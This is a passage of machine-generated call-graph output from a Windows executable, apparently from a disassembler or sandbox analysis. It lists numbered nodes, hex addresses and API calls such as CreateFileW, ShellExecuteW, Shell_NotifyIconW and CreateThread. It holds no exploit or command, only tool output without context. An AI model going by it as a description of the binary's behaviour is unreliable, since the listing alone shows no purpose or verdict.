___std_exception_copy 21 API calls 97050->97051 97052 a2dba 97051->97052 97053 5ea0c ___std_exception_copy 21 API calls 97052->97053 97054 a2dc4 97053->97054 97055 350f5 40 API calls 97054->97055 97056 a2dd8 97055->97056 97057 a28fe 27 API calls 97056->97057 97059 a2dee 97057->97059 97058 a2d3f 97058->96903 97059->97058 97382 a22ce 97059->97382 97061->96914 97063 34f43 97062->97063 97065 34f4a 97062->97065 97064 5e678 67 API calls 97063->97064 97064->97065 97066 34f6a FreeLibrary 97065->97066 97067 34f59 97065->97067 97066->97067 97067->96908 97068->96913 97069->96917 97070->96917 97071->96917 97072->96917 97073->96917 97074->96919 97076 34ec6 97075->97076 97077 34ea8 GetProcAddress 97075->97077 97080 5e5eb 97076->97080 97078 34eb8 97077->97078 97078->97076 97079 34ebf FreeLibrary 97078->97079 97079->97076 97113 5e52a 97080->97113 97082 34eea 97082->97018 97082->97019 97084 34e6e GetProcAddress 97083->97084 97085 34e8d 97083->97085 97086 34e7e 97084->97086 97088 34f80 97085->97088 97086->97085 97087 34e86 FreeLibrary 97086->97087 97087->97085 97089 4fe0b 22 API calls 97088->97089 97090 34f95 97089->97090 97181 35722 97090->97181 97092 34fa1 __fread_nolock 97093 350a5 97092->97093 97094 73d1d 97092->97094 97104 34fdc 97092->97104 97184 342a2 CreateStreamOnHGlobal 97093->97184 97195 a304d 74 API calls 97094->97195 97097 73d22 97099 3511f 64 API calls 97097->97099 97098 350f5 40 API calls 97098->97104 97100 73d45 97099->97100 97101 350f5 40 API calls 97100->97101 97102 3506e ISource 97101->97102 97102->97026 97104->97097 97104->97098 97104->97102 97190 3511f 97104->97190 97106 35107 97105->97106 97107 73d70 97105->97107 97217 5e8c4 97106->97217 97110 a28fe 97359 a274e 97110->97359 97112 a2919 97112->97034 97116 5e536 ___DestructExceptionObject 97113->97116 97114 5e544 97138 5f2d9 20 API calls __dosmaperr 97114->97138 97116->97114 97118 5e574 97116->97118 97117 5e549 97139 627ec 26 API calls _strftime 97117->97139 97120 5e586 97118->97120 97121 5e579 97118->97121 97130 68061 97120->97130 97140 5f2d9 20 API calls __dosmaperr 97121->97140 97124 5e58f 97125 5e595 97124->97125 97126 5e5a2 97124->97126 97141 5f2d9 20 API calls __dosmaperr 97125->97141 97142 5e5d4 LeaveCriticalSection __fread_nolock 97126->97142 97127 5e554 __wsopen_s 97127->97082 97131 6806d ___DestructExceptionObject 97130->97131 97143 62f5e EnterCriticalSection 97131->97143 97133 6807b 97144 680fb 97133->97144 97137 680ac __wsopen_s 97137->97124 97138->97117 97139->97127 97140->97127 97141->97127 97142->97127 97143->97133 97145 6811e 97144->97145 97146 68177 97145->97146 97153 68088 97145->97153 97160 5918d EnterCriticalSection 97145->97160 97161 591a1 LeaveCriticalSection 97145->97161 97162 64c7d 97146->97162 97151 68189 97151->97153 97175 63405 11 API calls 2 library calls 97151->97175 97157 680b7 97153->97157 97154 681a8 97176 5918d EnterCriticalSection 97154->97176 97180 62fa6 LeaveCriticalSection 97157->97180 97159 680be 97159->97137 97160->97145 97161->97145 97168 64c8a __dosmaperr 97162->97168 97163 64cca 97178 5f2d9 20 API calls __dosmaperr 97163->97178 97164 64cb5 RtlAllocateHeap 97166 64cc8 97164->97166 97164->97168 97169 629c8 97166->97169 97168->97163 97168->97164 97177 54ead 7 API calls 2 library calls 97168->97177 97170 629d3 RtlFreeHeap 97169->97170 97171 629fc _free 97169->97171 97170->97171 97172 629e8 97170->97172 97171->97151 97179 5f2d9 20 API calls __dosmaperr 97172->97179 97174 629ee GetLastError 97174->97171 97175->97154 97176->97153 97177->97168 97178->97166 97179->97174 97180->97159 97182 4fddb 22 API calls 97181->97182 97183 35734 97182->97183 97183->97092 97185 342bc FindResourceExW 97184->97185 97189 342d9 97184->97189 97186 735ba LoadResource 97185->97186 97185->97189 97187 735cf SizeofResource 97186->97187 97186->97189 97188 735e3 LockResource 97187->97188 97187->97189 97188->97189 97189->97104 97191 73d90 97190->97191 97192 3512e 97190->97192 97196 5ece3 97192->97196 97195->97097 97199 5eaaa 97196->97199 97198 3513c 97198->97104 97202 5eab6 ___DestructExceptionObject 97199->97202 97200 5eac2 97212 5f2d9 20 API calls __dosmaperr 97200->97212 97202->97200 97203 5eae8 97202->97203 97214 5918d EnterCriticalSection 97203->97214 97205 5eac7 97213 627ec 26 API calls _strftime 97205->97213 97206 5eaf4 97215 5ec0a 62 API calls 2 library calls 97206->97215 97209 5eb08 97216 5eb27 LeaveCriticalSection __fread_nolock 97209->97216 97211 5ead2 __wsopen_s 97211->97198 97212->97205 97213->97211 97214->97206 97215->97209 97216->97211 97220 5e8e1 97217->97220 97219 35118 97219->97110 97221 5e8ed ___DestructExceptionObject 97220->97221 97222 5e900 ___scrt_fastfail 97221->97222 97223 5e92d 97221->97223 97224 5e925 __wsopen_s 97221->97224 97247 5f2d9 20 API calls __dosmaperr 97222->97247 97233 5918d EnterCriticalSection 97223->97233 97224->97219 97226 5e937 97234 5e6f8 97226->97234 97229 5e91a 97248 627ec 26 API calls _strftime 97229->97248 97233->97226 97235 5e70a ___scrt_fastfail 97234->97235 97239 5e727 97234->97239 97236 5e717 97235->97236 97235->97239 97244 5e76a __fread_nolock 97235->97244 97322 5f2d9 20 API calls __dosmaperr 97236->97322 97249 5e96c LeaveCriticalSection __fread_nolock 97239->97249 97240 5e886 ___scrt_fastfail 97325 5f2d9 20 API calls __dosmaperr 97240->97325 97244->97239 97244->97240 97250 5d955 97244->97250 97257 68d45 97244->97257 97324 5cf78 26 API calls 4 library calls 97244->97324 97245 5e71c 97323 627ec 26 API calls _strftime 97245->97323 97247->97229 97248->97224 97249->97224 97251 5d976 97250->97251 97252 5d961 97250->97252 97251->97244 97326 5f2d9 20 API calls __dosmaperr 97252->97326 97254 5d966 97327 627ec 26 API calls _strftime 97254->97327 97256 5d971 97256->97244 97258 68d57 97257->97258 97259 68d6f 97257->97259 97337 5f2c6 20 API calls __dosmaperr 97258->97337 97261 690d9 97259->97261 97270 68db4 97259->97270 97353 5f2c6 20 API calls __dosmaperr 97261->97353 97262 68d5c 97338 5f2d9 20 API calls __dosmaperr 97262->97338 97265 690de 97354 5f2d9 20 API calls __dosmaperr 97265->97354 97267 68dbf 97339 5f2c6 20 API calls __dosmaperr 97267->97339 97268 68dcc 97355 627ec 26 API calls _strftime 97268->97355 97270->97267 97271 68d64 97270->97271 97274 68def 97270->97274 97271->97244 97272 68dc4 97340 5f2d9 20 API calls __dosmaperr 97272->97340 97276 68e08 97274->97276 97277 68e2e 97274->97277 97278 68e4a 97274->97278 97276->97277 97282 68e15 97276->97282 97341 5f2c6 20 API calls __dosmaperr 97277->97341 97344 63820 21 API calls 2 library calls 97278->97344 97281 68e33 97342 5f2d9 20 API calls __dosmaperr 97281->97342 97328 6f89b 97282->97328 97283 68e61 97286 629c8 _free 20 API calls 97283->97286 97289 68e6a 97286->97289 97287 68fb3 97290 69029 97287->97290 97292 68fcc GetConsoleMode 97287->97292 97288 68e3a 97343 627ec 26 API calls _strftime 97288->97343 97293 629c8 _free 20 API calls 97289->97293 97294 6902d ReadFile 97290->97294 97292->97290 97295 68fdd 97292->97295 97296 68e71 97293->97296 97297 69047 97294->97297 97298 690a1 GetLastError 97294->97298 97295->97294 97299 68fe3 ReadConsoleW 97295->97299 97300 68e96 97296->97300 97301 68e7b 97296->97301 97297->97298 97304 6901e 97297->97304 97302 69005 97298->97302 97303 690ae 97298->97303 97299->97304 97306 68fff GetLastError 97299->97306 97347 69424 28 API calls __wsopen_s 97300->97347 97345 5f2d9 20 API calls __dosmaperr 97301->97345 97319 68e45 __fread_nolock 97302->97319 97348 5f2a3 20 API calls 2 library calls 97302->97348 97351 5f2d9 20 API calls __dosmaperr 97303->97351 97314 69083 97304->97314 97315 6906c 97304->97315 97304->97319 97306->97302 97307 629c8 _free 20 API calls 97307->97271 97310 690b3 97352 5f2c6 20 API calls __dosmaperr 97310->97352 97312 68e80 97346 5f2c6 20 API calls __dosmaperr 97312->97346 97318 6909a 97314->97318 97314->97319 97349 68a61 31 API calls 4 library calls 97315->97349 97350 688a1 29 API calls __wsopen_s 97318->97350 97319->97307 97321 6909f 97321->97319 97322->97245 97323->97239 97324->97244 97325->97245 97326->97254 97327->97256 97329 6f8b5 97328->97329 97330 6f8a8 97328->97330 97334 6f8c1 97329->97334 97357 5f2d9 20 API calls __dosmaperr 97329->97357 97356 5f2d9 20 API calls __dosmaperr 97330->97356 97333 6f8ad 97333->97287 97334->97287 97335 6f8e2 97358 627ec 26 API calls _strftime 97335->97358 97337->97262 97338->97271 97339->97272 97340->97268 97341->97281 97342->97288 97343->97319 97344->97283 97345->97312 97346->97319 97347->97282 97348->97319 97349->97319 97350->97321 97351->97310 97352->97319 97353->97265 97354->97268 97355->97271 97356->97333 97357->97335 97358->97333 97362 5e4e8 97359->97362 97361 a275d 97361->97112 97365 5e469 97362->97365 97364 5e505 97364->97361 97366 5e478 97365->97366 97368 5e48c 97365->97368 97373 5f2d9 20 API calls __dosmaperr 97366->97373 97372 5e488 __alldvrm 97368->97372 97375 6333f 11 API calls 2 library calls 97368->97375 97369 5e47d 97374 627ec 26 API calls _strftime 97369->97374 97372->97364 97373->97369 97374->97372 97375->97372 97381 a2e7a 97376->97381 97377 350f5 40 API calls 97377->97381 97378 a2d3b 97378->97041 97378->97058 97379 a28fe 27 API calls 97379->97381 97380 3511f 64 API calls 97380->97381 97381->97377 97381->97378 97381->97379 97381->97380 97383 a22e7 97382->97383 97384 a22d9 97382->97384 97386 a232c 97383->97386 97387 5e5eb 29 API calls 97383->97387 97398 a22f0 97383->97398 97385 5e5eb 29 API calls 97384->97385 97385->97383 97411 a2557 97386->97411 97389 a2311 97387->97389 97389->97386 97391 a231a 97389->97391 97390 a2370 97392 a2374 97390->97392 97393 a2395 97390->97393 97395 5e678 67 API calls 97391->97395 97391->97398 97394 a2381 97392->97394 97397 5e678 67 API calls 97392->97397 97415 a2171 97393->97415 97394->97398 97402 5e678 67 API calls 97394->97402 97395->97398 97397->97394 97398->97058 97399 a239d 97400 a23c3 97399->97400 97401 a23a3 97399->97401 97422 a23f3 97400->97422 97403 a23b0 97401->97403 97405 5e678 67 API calls 97401->97405 97402->97398 97403->97398 97406 5e678 67 API calls 97403->97406 97405->97403 97406->97398 97407 a23ca 97408 a23de 97407->97408 97430 5e678 97407->97430 97408->97398 97410 5e678 67 API calls 97408->97410 97410->97398 97412 a257c 97411->97412 97414 a2565 __fread_nolock 97411->97414 97413 5e8c4 __fread_nolock 40 API calls 97412->97413 97413->97414 97414->97390 97416 5ea0c ___std_exception_copy 21 API calls 97415->97416 97417 a217f 97416->97417 97418 5ea0c ___std_exception_copy 21 API calls 97417->97418 97419 a2190 97418->97419 97420 5ea0c ___std_exception_copy 21 API calls 97419->97420 97421 a219c 97420->97421 97421->97399 97429 a2408 97422->97429 97423 a24c0 97447 a2724 97423->97447 97425 a24c7 97425->97407 97426 a21cc 40 API calls 97426->97429 97429->97423 97429->97425 97429->97426 97443 a2606 97429->97443 97451 a2269 40 API calls 97429->97451 97431 5e684 ___DestructExceptionObject 97430->97431 97432 5e695 97431->97432 97433 5e6aa 97431->97433 97504 5f2d9 20 API calls __dosmaperr 97432->97504 97442 5e6a5 __wsopen_s 97433->97442 97487 5918d EnterCriticalSection 97433->97487 97435 5e69a 97505 627ec 26 API calls _strftime 97435->97505 97438 5e6c6 97488 5e602 97438->97488 97440 5e6d1 97506 5e6ee LeaveCriticalSection __fread_nolock 97440->97506 97442->97408 97444 a261d 97443->97444 97446 a2617 97443->97446 97444->97429 97446->97444 97452 a26d7 97446->97452 97448 a2742 97447->97448 97449 a2731 97447->97449 97448->97425 97450 5dbb3 65 API calls 97449->97450 97450->97448 97451->97429 97453 a2703 97452->97453 97455 a2714 97452->97455 97456 5dbb3 97453->97456 97455->97446 97457 5dbdd 97456->97457 97458 5dbc1 97456->97458 97457->97455 97458->97457 97459 5dbe3 97458->97459 97460 5dbcd 97458->97460 97465 5d9cc 97459->97465 97468 5f2d9 20 API calls __dosmaperr 97460->97468 97463 5dbd2 97469 627ec 26 API calls _strftime 97463->97469 97470 5d97b 97465->97470 97467 5d9f0 97467->97457 97468->97463 97469->97457 97471 5d987 ___DestructExceptionObject 97470->97471 97478 5918d EnterCriticalSection 97471->97478 97473 5d995 97479 5d9f4 97473->97479 97477 5d9b3 __wsopen_s 97477->97467 97478->97473 97480 649a1 27 API calls 97479->97480 97481 5da09 97480->97481 97482 5da3a 62 API calls 97481->97482 97483 5da24 97482->97483 97484 64a56 62 API calls 97483->97484 97485 5d9a2 97484->97485 97486 5d9c0 LeaveCriticalSection __fread_nolock 97485->97486 97486->97477 97487->97438 97489 5e624 97488->97489 97490 5e60f 97488->97490 97497 5e61f 97489->97497 97507 5dc0b 97489->97507 97532 5f2d9 20 API calls __dosmaperr 97490->97532 97492 5e614 97533 627ec 26 API calls _strftime 97492->97533 97497->97440 97499 5d955 __fread_nolock 26 API calls 97500 5e646 97499->97500 97517 6862f 97500->97517 97503 629c8 _free 20 API calls 97503->97497 97504->97435 97505->97442 97506->97442 97508 5dc23 97507->97508 97509 5dc1f 97507->97509 97508->97509 97510 5d955 __fread_nolock 26 API calls 97508->97510 97513 64d7a 97509->97513 97511 5dc43 97510->97511 97534 659be 97511->97534 97514 5e640 97513->97514 97515 64d90 97513->97515 97514->97499 97515->97514 97516 629c8 _free 20 API calls 97515->97516 97516->97514 97518 6863e 97517->97518 97519 68653 97517->97519 97657 5f2c6 20 API calls __dosmaperr 97518->97657 97520 6868e 97519->97520 97524 6867a 97519->97524 97659 5f2c6 20 API calls __dosmaperr 97520->97659 97523 68643 97658 5f2d9 20 API calls __dosmaperr 97523->97658 97654 68607 97524->97654 97525 68693 97660 5f2d9 20 API calls __dosmaperr 97525->97660 97529 5e64c 97529->97497 97529->97503 97530 6869b 97661 627ec 26 API calls _strftime 97530->97661 97532->97492 97533->97497 97535 659ca ___DestructExceptionObject 97534->97535 97536 659d2 97535->97536 97537 659ea 97535->97537 97613 5f2c6 20 API calls __dosmaperr 97536->97613 97539 65a88 97537->97539 97543 65a1f 97537->97543 97618 5f2c6 20 API calls __dosmaperr 97539->97618 97540 659d7 97614 5f2d9 20 API calls __dosmaperr 97540->97614 97559 65147 EnterCriticalSection 97543->97559 97544 65a8d 97619 5f2d9 20 API calls __dosmaperr 97544->97619 97545 659df __wsopen_s 97545->97509 97548 65a25 97550 65a56 97548->97550 97551 65a41 97548->97551 97549 65a95 97620 627ec 26 API calls _strftime 97549->97620 97560 65aa9 97550->97560 97615 5f2d9 20 API calls __dosmaperr 97551->97615 97555 65a51 97617 65a80 LeaveCriticalSection __wsopen_s 97555->97617 97556 65a46 97616 5f2c6 20 API calls __dosmaperr 97556->97616 97559->97548 97561 65ad7 97560->97561 97598 65ad0 97560->97598 97562 65afa 97561->97562 97563 65adb 97561->97563 97567 65b4b 97562->97567 97568 65b2e 97562->97568 97628 5f2c6 20 API calls __dosmaperr 97563->97628 97566 65ae0 97629 5f2d9 20 API calls __dosmaperr 97566->97629 97571 65b61 97567->97571 97634 69424 28 API calls __wsopen_s 97567->97634 97631 5f2c6 20 API calls __dosmaperr 97568->97631 97569 65cb1 97569->97555 97621 6564e 97571->97621 97573 65ae7 97630 627ec 26 API calls _strftime 97573->97630 97576 65b33 97632 5f2d9 20 API calls __dosmaperr 97576->97632 97580 65b6f 97585 65b95 97580->97585 97586 65b73 97580->97586 97581 65ba8 97583 65c02 WriteFile 97581->97583 97584 65bbc 97581->97584 97582 65b3b 97633 627ec 26 API calls _strftime 97582->97633 97588 65c25 GetLastError 97583->97588 97593 65b8b 97583->97593 97590 65bc4 97584->97590 97591 65bf2 97584->97591 97636 6542e 45 API calls 3 library calls 97585->97636 97592 65c69 97586->97592 97635 655e1 GetLastError WriteConsoleW CreateFileW __wsopen_s 97586->97635 97588->97593 97594 65be2 97590->97594 97595 65bc9 97590->97595 97639 656c4 7 API calls 2 library calls 97591->97639 97592->97598 97643 5f2d9 20 API calls __dosmaperr 97592->97643 97593->97592 97593->97598 97604 65c45 97593->97604 97638 65891 8 API calls 2 library calls 97594->97638 97595->97592 97600 65bd2 97595->97600 97645 50a8c 97598->97645 97637 657a3 7 API calls 2 library calls 97600->97637 97602 65be0 97602->97593 97603 65c8e 97644 5f2c6 20 API calls __dosmaperr 97603->97644 97607 65c60 97604->97607 97608 65c4c 97604->97608 97642 5f2a3 20 API calls 2 library calls 97607->97642 97640 5f2d9 20 API calls __dosmaperr 97608->97640 97611 65c51 97641 5f2c6 20 API calls __dosmaperr 97611->97641 97613->97540 97614->97545 97615->97556 97616->97555 97617->97545 97618->97544 97619->97549 97620->97545 97622 6f89b __fread_nolock 26 API calls 97621->97622 97623 6565e 97622->97623 97625 65663 97623->97625 97652 62d74 38 API calls 3 library calls 97623->97652 97625->97580 97625->97581 97626 65686 97626->97625 97627 656a4 GetConsoleMode 97626->97627 97627->97625 97628->97566 97629->97573 97630->97598 97631->97576 97632->97582 97633->97598 97634->97571 97635->97593 97636->97593 97637->97602 97638->97602 97639->97602 97640->97611 97641->97598 97642->97598 97643->97603 97644->97598 97646 50a95 97645->97646 97647 50a97 IsProcessorFeaturePresent 97645->97647 97646->97569 97649 50c5d 97647->97649 97653 50c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 97649->97653 97651 50d40 97651->97569 97652->97626 97653->97651 97662 68585 97654->97662 97656 6862b 97656->97529 97657->97523 97658->97529 97659->97525 97660->97530 97661->97529 97663 68591 ___DestructExceptionObject 97662->97663 97673 65147 EnterCriticalSection 97663->97673 97665 6859f 97666 685c6 97665->97666 97667 685d1 97665->97667 97674 686ae 97666->97674 97689 5f2d9 20 API calls __dosmaperr 97667->97689 97670 685cc 97690 685fb LeaveCriticalSection __wsopen_s 97670->97690 97672 685ee __wsopen_s 97672->97656 97673->97665 97691 653c4 97674->97691 97676 686c4 97704 65333 21 API calls 3 library calls 97676->97704 97678 686be 97678->97676 97680 653c4 __wsopen_s 26 API calls 97678->97680 97688 686f6 97678->97688 97679 6871c 97687 6873e 97679->97687 97705 5f2a3 20 API calls 2 library calls 97679->97705 97682 686ed 97680->97682 97681 653c4 __wsopen_s 26 API calls 97683 68702 FindCloseChangeNotification 97681->97683 97685 653c4 __wsopen_s 26 API calls 97682->97685 97683->97676 97686 6870e GetLastError 97683->97686 97685->97688 97686->97676 97687->97670 97688->97676 97688->97681 97689->97670 97690->97672 97692 653e6 97691->97692 97693 653d1 97691->97693 97695 5f2c6 __dosmaperr 20 API calls 97692->97695 97697 6540b 97692->97697 97694 5f2c6 __dosmaperr 20 API calls 97693->97694 97696 653d6 97694->97696 97698 65416 97695->97698 97699 5f2d9 _free 20 API calls 97696->97699 97697->97678 97700 5f2d9 _free 20 API calls 97698->97700 97701 653de 97699->97701 97702 6541e 97700->97702 97701->97678 97703 627ec _strftime 26 API calls 97702->97703 97703->97701 97704->97679 97705->97687 97706->96937 97707 72ba5 97708 32b25 97707->97708 97709 72baf 97707->97709 97735 32b83 7 API calls 97708->97735 97750 33a5a 97709->97750 97713 72bb8 97757 39cb3 97713->97757 97716 32b2f 97725 32b44 97716->97725 97739 33837 97716->97739 97717 72bc6 97718 72bf5 97717->97718 97719 72bce 97717->97719 97722 333c6 22 API calls 97718->97722 97763 333c6 97719->97763 97733 72bf1 GetForegroundWindow ShellExecuteW 97722->97733 97726 32b5f 97725->97726 97749 330f2 Shell_NotifyIconW ___scrt_fastfail 97725->97749 97732 32b66 SetCurrentDirectoryW 97726->97732 97730 333c6 22 API calls 97730->97733 97731 72c26 97731->97726 97734 32b7a 97732->97734 97733->97731 97781 32cd4 7 API calls 97735->97781 97737 32b2a 97738 32c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 97737->97738 97738->97716 97740 33862 ___scrt_fastfail 97739->97740 97782 34212 97740->97782 97743 338e8 97745 73386 Shell_NotifyIconW 97743->97745 97746 33906 Shell_NotifyIconW 97743->97746 97786 33923 97746->97786 97748 3391c 97748->97725 97749->97726 97751 71f50 __wsopen_s 97750->97751 97752 33a67 GetModuleFileNameW 97751->97752 97753 39cb3 22 API calls 97752->97753 97754 33a8d 97753->97754 97755 33aa2 23 API calls 97754->97755 97756 33a97 97755->97756 97756->97713 97758 39cc2 _wcslen 97757->97758 97759 4fe0b 22 API calls 97758->97759 97760 39cea __fread_nolock 97759->97760 97761 4fddb 22 API calls 97760->97761 97762 39d00 97761->97762 97762->97717 97764 730bb 97763->97764 97765 333dd 97763->97765 97767 4fddb 22 API calls 97764->97767 97818 333ee 97765->97818 97769 730c5 _wcslen 97767->97769 97768 333e8 97772 36350 97768->97772 97770 4fe0b 22 API calls 97769->97770 97771 730fe __fread_nolock 97770->97771 97773 36362 97772->97773 97774 74a51 97772->97774 97833 36373 97773->97833 97843 34a88 22 API calls __fread_nolock 97774->97843 97777 74a5b 97779 74a67 97777->97779 97780 3a8c7 22 API calls 97777->97780 97778 3636e 97778->97730 97780->97779 97781->97737 97783 735a4 97782->97783 97784 338b7 97782->97784 97783->97784 97785 735ad DestroyIcon 97783->97785 97784->97743 97808 9c874 42 API calls _strftime 97784->97808 97785->97784 97787 3393f 97786->97787 97806 33a13 97786->97806 97809 36270 97787->97809 97790 73393 LoadStringW 97794 733ad 97790->97794 97791 3395a 97792 36b57 22 API calls 97791->97792 97793 3396f 97792->97793 97795 733c9 97793->97795 97796 3397c 97793->97796 97801 33994 ___scrt_fastfail 97794->97801 97814 3a8c7 97794->97814 97799 36350 22 API calls 97795->97799 97796->97794 97798 33986 97796->97798 97800 36350 22 API calls 97798->97800 97802 733d7 97799->97802 97800->97801 97804 339f9 Shell_NotifyIconW 97801->97804 97802->97801 97803 333c6 22 API calls 97802->97803 97805 733f9 97803->97805 97804->97806 97807 333c6 22 API calls 97805->97807 97806->97748 97807->97801 97808->97743 97810 4fe0b 22 API calls 97809->97810 97811 36295 97810->97811 97812 4fddb 22 API calls 97811->97812 97813 3394d 97812->97813 97813->97790 97813->97791 97815 3a8ea __fread_nolock 97814->97815 97816 3a8db 97814->97816 97815->97801 97816->97815 97817 4fe0b 22 API calls 97816->97817 97817->97815 97819 333fe _wcslen 97818->97819 97820 33411 97819->97820 97821 7311d 97819->97821 97828 3a587 97820->97828 97822 4fddb 22 API calls 97821->97822 97824 73127 97822->97824 97826 4fe0b 22 API calls 97824->97826 97825 3341e __fread_nolock 97825->97768 97827 73157 __fread_nolock 97826->97827 97829 3a59d 97828->97829 97832 3a598 __fread_nolock 97828->97832 97830 7f80f 97829->97830 97831 4fe0b 22 API calls 97829->97831 97831->97832 97832->97825 97834 36382 97833->97834 97839 363b6 __fread_nolock 97833->97839 97835 74a82 97834->97835 97836 363a9 97834->97836 97834->97839 97838 4fddb 22 API calls 97835->97838 97837 3a587 22 API calls 97836->97837 97837->97839 97840 74a91 97838->97840 97839->97778 97841 4fe0b 22 API calls 97840->97841 97842 74ac5 __fread_nolock 97841->97842 97843->97777 97844 68402 97849 681be 97844->97849 97847 6842a 97854 681ef try_get_first_available_module 97849->97854 97851 683ee 97868 627ec 26 API calls _strftime 97851->97868 97853 68343 97853->97847 97861 70984 97853->97861 97857 68338 97854->97857 97864 58e0b 40 API calls 2 library calls 97854->97864 97856 6838c 97856->97857 97865 58e0b 40 API calls 2 library calls 97856->97865 97857->97853 97867 5f2d9 20 API calls __dosmaperr 97857->97867 97859 683ab 97859->97857 97866 58e0b 40 API calls 2 library calls 97859->97866 97869 70081 97861->97869 97863 7099f 97863->97847 97864->97856 97865->97859 97866->97857 97867->97851 97868->97853 97872 7008d ___DestructExceptionObject 97869->97872 97870 7009b 97927 5f2d9 20 API calls __dosmaperr 97870->97927 97872->97870 97874 700d4 97872->97874 97873 700a0 97928 627ec 26 API calls _strftime 97873->97928 97880 7065b 97874->97880 97879 700aa __wsopen_s 97879->97863 97930 7042f 97880->97930 97883 706a6 97948 65221 97883->97948 97884 7068d 97962 5f2c6 20 API calls __dosmaperr 97884->97962 97887 706ab 97889 706b4 97887->97889 97890 706cb 97887->97890 97888 70692 97963 5f2d9 20 API calls __dosmaperr 97888->97963 97964 5f2c6 20 API calls __dosmaperr 97889->97964 97961 7039a CreateFileW 97890->97961 97894 706b9 97965 5f2d9 20 API calls __dosmaperr 97894->97965 97896 70781 GetFileType 97897 707d3 97896->97897 97898 7078c GetLastError 97896->97898 97970 6516a 21 API calls 3 library calls 97897->97970 97968 5f2a3 20 API calls 2 library calls 97898->97968 97899 70756 GetLastError 97967 5f2a3 20 API calls 2 library calls 97899->97967 97901 70704 97901->97896 97901->97899 97966 7039a CreateFileW 97901->97966 97903 7079a CloseHandle 97903->97888 97905 707c3 97903->97905 97969 5f2d9 20 API calls __dosmaperr 97905->97969 97907 70749 97907->97896 97907->97899 97909 707f4 97911 70840 97909->97911 97971 705ab 72 API calls 4 library calls 97909->97971 97910 707c8 97910->97888 97915 7086d 97911->97915 97972 7014d 72 API calls 4 library calls 97911->97972 97914 70866 97914->97915 97916 7087e 97914->97916 97917 686ae __wsopen_s 29 API calls 97915->97917 97918 700f8 97916->97918 97919 708fc CloseHandle 97916->97919 97917->97918 97929 70121 LeaveCriticalSection __wsopen_s 97918->97929 97973 7039a CreateFileW 97919->97973 97921 70927 97922 7095d 97921->97922 97923 70931 GetLastError 97921->97923 97922->97918 97974 5f2a3 20 API calls 2 library calls 97923->97974 97925 7093d 97975 65333 21 API calls 3 library calls 97925->97975 97927->97873 97928->97879 97929->97879 97931 7046a 97930->97931 97932 70450 97930->97932 97976 703bf 97931->97976 97932->97931 97983 5f2d9 20 API calls __dosmaperr 97932->97983 97935 7045f 97984 627ec 26 API calls _strftime 97935->97984 97937 704a2 97938 704d1 97937->97938 97985 5f2d9 20 API calls __dosmaperr 97937->97985 97946 70524 97938->97946 97987 5d70d 26 API calls 2 library calls 97938->97987 97941 7051f 97943 7059e 97941->97943 97941->97946 97942 704c6 97986 627ec 26 API calls _strftime 97942->97986 97988 627fc 11 API calls _abort 97943->97988 97946->97883 97946->97884 97947 705aa 97949 6522d ___DestructExceptionObject 97948->97949 97991 62f5e EnterCriticalSection 97949->97991 97951 65234 97952 65259 97951->97952 97957 652c7 EnterCriticalSection 97951->97957 97960 6527b 97951->97960 97995 65000 97952->97995 97955 652a4 __wsopen_s 97955->97887 97958 652d4 LeaveCriticalSection 97957->97958 97957->97960 97958->97951 97992 6532a 97960->97992 97961->97901 97962->97888 97963->97918 97964->97894 97965->97888 97966->97907 97967->97888 97968->97903 97969->97910 97970->97909 97971->97911 97972->97914 97973->97921 97974->97925 97975->97922 97978 703d7 97976->97978 97977 703f2 97977->97937 97978->97977 97989 5f2d9 20 API calls __dosmaperr 97978->97989 97980 70416 97990 627ec 26 API calls _strftime 97980->97990 97982 70421 97982->97937 97983->97935 97984->97931 97985->97942 97986->97938 97987->97941 97988->97947 97989->97980 97990->97982 97991->97951 98003 62fa6 LeaveCriticalSection 97992->98003 97994 65331 97994->97955 97996 64c7d __dosmaperr 20 API calls 97995->97996 97999 65012 97996->97999 97997 6501f 97998 629c8 _free 20 API calls 97997->97998 98000 65071 97998->98000 97999->97997 98004 63405 11 API calls 2 library calls 97999->98004 98000->97960 98002 65147 EnterCriticalSection 98000->98002 98002->97960 98003->97994 98004->97999 98005 31044 98010 310f3 98005->98010 98007 3104a 98046 500a3 29 API calls __onexit 98007->98046 98009 31054 98047 31398 98010->98047 98014 3116a 98015 3a961 22 API calls 98014->98015 98016 31174 98015->98016 98017 3a961 22 API calls 98016->98017 98018 3117e 98017->98018 98019 3a961 22 API calls 98018->98019 98020 31188 98019->98020 98021 3a961 22 API calls 98020->98021 98022 311c6 98021->98022 98023 3a961 22 API calls 98022->98023 98024 31292 98023->98024 98057 3171c 98024->98057 98028 312c4 98029 3a961 22 API calls 98028->98029 98030 312ce 98029->98030 98078 41940 98030->98078 98032 312f9 98088 31aab 98032->98088 98034 31315 98035 31325 GetStdHandle 98034->98035 98036 72485 98035->98036 98037 3137a 98035->98037 98036->98037 98038 7248e 98036->98038 98040 31387 OleInitialize 98037->98040 98039 4fddb 22 API calls 98038->98039 98041 72495 98039->98041 98040->98007 98095 a011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 98041->98095 98043 7249e 98096 a0944 CreateThread 98043->98096 98045 724aa CloseHandle 98045->98037 98046->98009 98097 313f1 98047->98097 98050 313f1 22 API calls 98051 313d0 98050->98051 98052 3a961 22 API calls 98051->98052 98053 313dc 98052->98053 98054 36b57 22 API calls 98053->98054 98055 31129 98054->98055 98056 31bc3 6 API calls 98055->98056 98056->98014 98058 3a961 22 API calls 98057->98058 98059 3172c 98058->98059 98060 3a961 22 API calls 98059->98060 98061 31734 98060->98061 98062 3a961 22 API calls 98061->98062 98063 3174f 98062->98063 98064 4fddb 22 API calls 98063->98064 98065 3129c 98064->98065 98066 31b4a 98065->98066 98067 31b58 98066->98067 98068 3a961 22 API calls 98067->98068 98069 31b63 98068->98069 98070 3a961 22 API calls 98069->98070 98071 31b6e 98070->98071 98072 3a961 22 API calls 98071->98072 98073 31b79 98072->98073 98074 3a961 22 API calls 98073->98074 98075 31b84 98074->98075 98076 4fddb 22 API calls 98075->98076 98077 31b96 RegisterWindowMessageW 98076->98077 98077->98028 98079 41981 98078->98079 98082 4195d 98078->98082 98104 50242 5 API calls __Init_thread_wait 98079->98104 98087 4196e 98082->98087 98106 50242 5 API calls __Init_thread_wait 98082->98106 98083 4198b 98083->98082 98105 501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98083->98105 98084 48727 98084->98087 98107 501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 